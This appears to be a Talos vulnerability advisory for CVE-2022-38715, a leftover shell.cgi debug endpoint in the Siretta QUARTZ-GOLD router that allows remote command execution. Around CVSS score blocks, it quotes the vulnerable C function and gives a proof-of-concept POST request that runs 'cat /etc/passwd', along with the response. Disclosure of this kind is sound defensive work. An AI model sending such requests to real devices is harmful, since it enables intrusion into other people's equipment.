7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
MULTIPLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:M/C:P/I:P/A:P
0.002 Low
EPSS
Percentile
51.0%
CVE-2022-38715
A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
QUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>
7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-489 - Leftover Debug Code
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.
Based on the web page shown, functionalities and the documentation publicly available, the QUARTZ-GOLD does not provide any way to directly access the linux system that runs on the router. The router’s web server is based on AdvancedTomato, which offers several debug APIs active by default. The developer, allegedly, forgot to disable those debug APIs. For instance, the AdvancedTomato’s shell.cgi
API is still active, allowing arbitrary command execution:
static void wo_shell(char *url)
{
web_puts("\ncmdresult = '");
_execute_command(NULL, webcgi_get("command"), NULL, WOF_JAVASCRIPT);
web_puts("';");
}
wo_shell
is the function that is called when the shell.cgi
API is requested. This function will call the _execute_command
with the request’s command
parameter. This function will effectively execute the provided shell command. The leftover debug code allows arbitrary command execution.
Sending a request like the following:
POST /shell.cgi HTTP/1.1
Authorization: Basic <a>
Content-Length: 52
command=cat /etc/passwd&_http_id=<the correct tid>
Will generate the following response:
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 22:01:30 GMT
Content-Type: text/javascript
Cache-Control: no-cache, no-store, must-revalidate, private
Expires: Thu, 31 Dec 1970 00:00:00 GMT
Pragma: no-cache
Connection: close
cmdresult = 'root:x:0:0:root:/root:/bin/sh\x0aadmin:x:0:0:admin:/root:/bin/sh\x0anobody:x:65534:65534:nobody:/dev/null:/dev/null\x0a';
The request will make the router execute the command cat /etc/passwd
and respond to the HTTP request with the output of the command back.
2022-10-14 - Initial Vendor Contact
2022-10-20 - Vendor Disclosure
2022-11-24 - Vendor Patch Release
2023-01-26 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2022-1615
Previous Report
TALOS-2022-1608
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
MULTIPLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:M/C:P/I:P/A:P
0.002 Low
EPSS
Percentile
51.0%